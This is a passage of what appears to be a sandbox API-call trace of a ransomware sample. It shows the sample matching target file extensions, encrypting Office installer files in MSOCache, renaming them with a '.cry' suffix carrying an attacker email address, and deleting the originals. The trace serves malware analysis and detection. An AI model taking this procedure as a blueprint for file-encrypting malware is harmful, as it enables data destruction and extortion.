Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi") returned 81 [0042.802] lstrlenW (lpString=".dbf") returned 4 [0042.802] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0042.802] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi") returned 81 [0042.802] lstrlenW (lpString=".1cd") returned 4 [0042.802] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0042.802] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi") returned 81 [0042.802] lstrlenW (lpString=".jpg") returned 4 [0042.802] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0042.802] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi") returned 81 [0042.802] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi") returned 81 [0042.802] lstrlenW (lpString=".doc") returned 4 [0042.802] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0042.802] lstrlenW (lpString=".docx") returned 5 [0042.802] lstrcmpiW (lpString1=".docx", lpString2="f.msi") returned -1 [0042.802] lstrlenW (lpString=".pdf") returned 4 [0042.802] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0042.802] lstrlenW (lpString=".xls") returned 4 [0042.802] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0042.802] lstrlenW (lpString=".xlsx") returned 5 [0042.802] lstrcmpiW (lpString1=".xlsx", lpString2="f.msi") returned -1 [0042.802] lstrlenW (lpString=".ppt") returned 4 [0042.803] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0042.803] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi") returned 81 [0042.803] lstrlenW (lpString=".zip") returned 4 [0042.803] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0042.803] lstrlenW (lpString=".rar") returned 4 [0042.803] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0042.803] lstrlenW (lpString=".bz2") returned 4 [0042.803] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0042.803] lstrlenW (lpString=".7z") returned 3 [0042.803] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0042.803] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi") returned 81 [0042.803] lstrlenW (lpString=".dbf") returned 4 [0042.803] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0042.803] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi") returned 81 [0042.803] lstrlenW (lpString=".1cd") returned 4 [0042.803] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0042.803] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi") returned 81 [0042.803] lstrlenW (lpString=".jpg") returned 4 [0042.803] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0042.803] lstrcmpiW (lpString1=".msi", lpString2=".cry") returned 1 [0042.803] lstrlenW (lpString="Proofing.msi") returned 12 [0042.803] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ec [0042.804] GetFileSizeEx (in: hFile=0x1ec, lpFileSize=0x2d9ff1c | out: lpFileSize=0x2d9ff1c*=868864) returned 1 [0042.804] CloseHandle (hObject=0x1ec) returned 1 [0042.804] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.msi")) returned 0x2020 [0042.804] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.msi.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0042.804] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ec [0042.804] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0042.804] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0042.804] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.msi.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0042.804] GetLastError () returned 0x0 [0042.804] ReadFile (in: hFile=0x1ec, lpBuffer=0x3950020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3950020*, lpNumberOfBytesRead=0x2d9fed4*=0xd4200, lpOverlapped=0x0) returned 1 [0042.870] WriteFile (in: hFile=0x188, lpBuffer=0x3950020*, nNumberOfBytesToWrite=0xd4210, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3950020*, lpNumberOfBytesWritten=0x2d9fc9c*=0xd4210, lpOverlapped=0x0) returned 1 [0042.886] ReadFile (in: hFile=0x1ec, lpBuffer=0x3950020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3950020*, lpNumberOfBytesRead=0x2d9fed4*=0x0, lpOverlapped=0x0) returned 1 [0042.886] WriteFile (in: hFile=0x188, lpBuffer=0x3950020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3950020*, lpNumberOfBytesWritten=0x2d9fc9c*=0xec, lpOverlapped=0x0) returned 1 [0042.886] SetEndOfFile (hFile=0x188) returned 1 [0042.886] CloseHandle (hObject=0x188) returned 1 [0042.892] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0042.892] SetEndOfFile (hFile=0x1ec) returned 1 [0043.174] CloseHandle (hObject=0x1ec) returned 1 [0043.174] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x2020) returned 1 [0043.176] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.msi")) returned 1 [0043.176] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi") returned 75 [0043.176] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi") returned 75 [0043.176] lstrlenW (lpString=".doc") returned 4 [0043.176] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0043.176] lstrlenW (lpString=".docx") returned 5 [0043.176] lstrcmpiW (lpString1=".docx", lpString2="g.msi") returned -1 [0043.176] lstrlenW (lpString=".pdf") returned 4 [0043.176] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0043.176] lstrlenW (lpString=".xls") returned 4 [0043.176] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0043.176] lstrlenW (lpString=".xlsx") returned 5 [0043.176] lstrcmpiW (lpString1=".xlsx", lpString2="g.msi") returned -1 [0043.176] lstrlenW (lpString=".ppt") returned 4 [0043.176] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0043.176] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi") returned 75 [0043.176] lstrlenW (lpString=".zip") returned 4 [0043.176] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0043.176] lstrlenW (lpString=".rar") returned 4 [0043.176] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0043.176] lstrlenW (lpString=".bz2") returned 4 [0043.176] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0043.176] lstrlenW (lpString=".7z") returned 3 [0043.176] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0043.176] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi") returned 75 [0043.176] lstrlenW (lpString=".dbf") returned 4 [0043.176] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0043.176] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi") returned 75 [0043.176] lstrlenW (lpString=".1cd") returned 4 [0043.177] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0043.177] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi") returned 75 [0043.177] lstrlenW (lpString=".jpg") returned 4 [0043.177] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0043.177] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi") returned 75 [0043.177] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi") returned 75 [0043.177] lstrlenW (lpString=".doc") returned 4 [0043.177] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0043.177] lstrlenW (lpString=".docx") returned 5 [0043.177] lstrcmpiW (lpString1=".docx", lpString2="g.msi") returned -1 [0043.177] lstrlenW (lpString=".pdf") returned 4 [0043.177] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0043.177] lstrlenW (lpString=".xls") returned 4 [0043.177] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0043.177] lstrlenW (lpString=".xlsx") returned 5 [0043.177] lstrcmpiW (lpString1=".xlsx", lpString2="g.msi") returned -1 [0043.177] lstrlenW (lpString=".ppt") returned 4 [0043.177] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0043.177] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi") returned 75 [0043.177] lstrlenW (lpString=".zip") returned 4 [0043.177] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0043.177] lstrlenW (lpString=".rar") returned 4 [0043.177] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0043.177] lstrlenW (lpString=".bz2") returned 4 [0043.177] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0043.177] lstrlenW (lpString=".7z") returned 3 [0043.177] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0043.177] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi") returned 75 [0043.177] lstrlenW (lpString=".dbf") returned 4 [0043.177] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0043.177] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi") returned 75 [0043.177] lstrlenW (lpString=".1cd") returned 4 [0043.177] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0043.177] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi") returned 75 [0043.178] lstrlenW (lpString=".jpg") returned 4 [0043.178] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0043.178] lstrcmpiW (lpString1=".cab", lpString2=".cry") returned -1 [0043.178] lstrlenW (lpString="InfLR.cab") returned 9 [0043.178] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\inflr.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ec [0043.178] GetFileSizeEx (in: hFile=0x1ec, lpFileSize=0x2d9ff1c | out: lpFileSize=0x2d9ff1c*=18874884) returned 1 [0043.178] CloseHandle (hObject=0x1ec) returned 1 [0043.178] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\inflr.cab")) returned 0x2020 [0043.178] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\inflr.cab.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0043.178] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\inflr.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\inflr.cab.id-9c354b42.[decryptoperator@qq.com].cry")) returned 1 [0043.179] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\inflr.cab.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ec [0043.179] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fc6c | out: lpNewFilePointer=0x0) returned 1 [0043.179] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fc2c | out: lpNewFilePointer=0x0) returned 1 [0043.179] ReadFile (in: hFile=0x1ec, lpBuffer=0x3950058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2d9fc38, lpOverlapped=0x0 | out: lpBuffer=0x3950058*, lpNumberOfBytesRead=0x2d9fc38*=0x40000, lpOverlapped=0x0) returned 1 [0043.212] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0x6000ac, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fc2c | out: lpNewFilePointer=0x0) returned 1 [0043.212] ReadFile (in: hFile=0x1ec, lpBuffer=0x3990058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2d9fc38, lpOverlapped=0x0 | out: lpBuffer=0x3990058*, lpNumberOfBytesRead=0x2d9fc38*=0x40000, lpOverlapped=0x0) returned 1 [0043.420] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x2d9fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0043.420] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0x11c0204, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fc2c | out: lpNewFilePointer=0x0) returned 1 [0043.420] ReadFile (in: hFile=0x1ec, lpBuffer=0x39d0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2d9fc38, lpOverlapped=0x0 | out: lpBuffer=0x39d0058*, lpNumberOfBytesRead=0x2d9fc38*=0x40000, lpOverlapped=0x0) returned 1 [0043.482] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.482] WriteFile (in: hFile=0x1ec, lpBuffer=0x3950020*, nNumberOfBytesToWrite=0xc00fe, lpNumberOfBytesWritten=0x2d9fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3950020*, lpNumberOfBytesWritten=0x2d9fcb0*=0xc00fe, lpOverlapped=0x0) returned 1 [0043.499] SetEndOfFile (hFile=0x1ec) returned 1 [0043.499] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x40000) returned 0x3ef0060 [0043.499] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fc7c | out: lpNewFilePointer=0x0) returned 1 [0043.499] WriteFile (in: hFile=0x1ec, lpBuffer=0x3ef0060*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2d9fc88, lpOverlapped=0x0 | out: lpBuffer=0x3ef0060*, lpNumberOfBytesWritten=0x2d9fc88*=0x40000, lpOverlapped=0x0) returned 1 [0043.501] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0x6000ac, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fc7c | out: lpNewFilePointer=0x0) returned 1 [0043.501] WriteFile (in: hFile=0x1ec, lpBuffer=0x3ef0060*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2d9fc88, lpOverlapped=0x0 | out: lpBuffer=0x3ef0060*, lpNumberOfBytesWritten=0x2d9fc88*=0x40000, lpOverlapped=0x0) returned 1 [0043.559] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0x11c0204, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fc7c | out: lpNewFilePointer=0x0) returned 1 [0043.559] WriteFile (in: hFile=0x1ec, lpBuffer=0x3ef0060*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2d9fc88, lpOverlapped=0x0 | out: lpBuffer=0x3ef0060*, lpNumberOfBytesWritten=0x2d9fc88*=0x40000, lpOverlapped=0x0) returned 1 [0043.562] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3ef0060 | out: hHeap=0x600000) returned 1 [0043.562] CloseHandle (hObject=0x1ec) returned 1 [0043.927] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x2020) returned 1 [0043.927] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab") returned 72 [0043.927] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab") returned 72 [0043.927] lstrlenW (lpString=".doc") returned 4 [0043.927] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0043.927] lstrlenW (lpString=".docx") returned 5 [0043.927] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1 [0043.927] lstrlenW (lpString=".pdf") returned 4 [0043.927] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0043.927] lstrlenW (lpString=".xls") returned 4 [0043.927] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0043.927] lstrlenW (lpString=".xlsx") returned 5 [0043.927] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1 [0043.927] lstrlenW (lpString=".ppt") returned 4 [0043.927] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0043.927] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab") returned 72 [0043.927] lstrlenW (lpString=".zip") returned 4 [0043.927] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0043.927] lstrlenW (lpString=".rar") returned 4 [0043.927] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0043.927] lstrlenW (lpString=".bz2") returned 4 [0043.927] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0043.927] lstrlenW (lpString=".7z") returned 3 [0043.927] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0043.927] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab") returned 72 [0043.927] lstrlenW (lpString=".dbf") returned 4 [0043.927] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0043.927] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab") returned 72 [0043.927] lstrlenW (lpString=".1cd") returned 4 [0043.928] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0043.928] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab") returned 72 [0043.928] lstrlenW (lpString=".jpg") returned 4 [0043.928] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0043.928] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab") returned 72 [0043.928] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab") returned 72 [0043.928] lstrlenW (lpString=".doc") returned 4 [0043.928] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0043.928] lstrlenW (lpString=".docx") returned 5 [0043.928] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1 [0043.928] lstrlenW (lpString=".pdf") returned 4 [0043.928] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0043.928] lstrlenW (lpString=".xls") returned 4 [0043.928] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0043.928] lstrlenW (lpString=".xlsx") returned 5 [0043.928] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1 [0043.928] lstrlenW (lpString=".ppt") returned 4 [0043.928] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0043.928] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab") returned 72 [0043.928] lstrlenW (lpString=".zip") returned 4 [0043.928] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0043.928] lstrlenW (lpString=".rar") returned 4 [0043.928] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0043.928] lstrlenW (lpString=".bz2") returned 4 [0043.928] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0043.928] lstrlenW (lpString=".7z") returned 3 [0043.928] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0043.928] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab") returned 72 [0043.928] lstrlenW (lpString=".dbf") returned 4 [0043.928] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0043.928] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab") returned 72 [0043.928] lstrlenW (lpString=".1cd") returned 4 [0043.928] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0043.928] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab") returned 72 [0043.928] lstrlenW (lpString=".jpg") returned 4 [0043.928] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0043.929] lstrcmpiW (lpString1=".msi", lpString2=".cry") returned 1 [0043.929] lstrlenW (lpString="OneNoteMUI.msi") returned 14 [0043.929] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ec [0043.929] GetFileSizeEx (in: hFile=0x1ec, lpFileSize=0x2d9ff1c | out: lpFileSize=0x2d9ff1c*=2503680) returned 1 [0043.929] CloseHandle (hObject=0x1ec) returned 1 [0043.929] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.msi")) returned 0x2020 [0043.929] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.msi.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0043.930] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.msi"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.msi.id-9c354b42.[decryptoperator@qq.com].cry")) returned 1 [0043.930] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.msi.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ec [0043.930] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fc6c | out: lpNewFilePointer=0x0) returned 1 [0043.930] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fc2c | out: lpNewFilePointer=0x0) returned 1 [0043.930] ReadFile (in: hFile=0x1ec, lpBuffer=0x3950058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2d9fc38, lpOverlapped=0x0 | out: lpBuffer=0x3950058*, lpNumberOfBytesRead=0x2d9fc38*=0x40000, lpOverlapped=0x0) returned 1 [0043.978] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0xcbc00, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fc2c | out: lpNewFilePointer=0x0) returned 1 [0043.978] ReadFile (in: hFile=0x1ec, lpBuffer=0x3990058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2d9fc38, lpOverlapped=0x0 | out: lpBuffer=0x3990058*, lpNumberOfBytesRead=0x2d9fc38*=0x40000, lpOverlapped=0x0) returned 1 [0044.054] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x2d9fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0044.054] SetFilePointerEx (in: hFile=0x1ec, liDistanceToMove=0x223400, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fc2c | out: lpNewFilePointer=0x0) returned 1 [0044.054] ReadFile 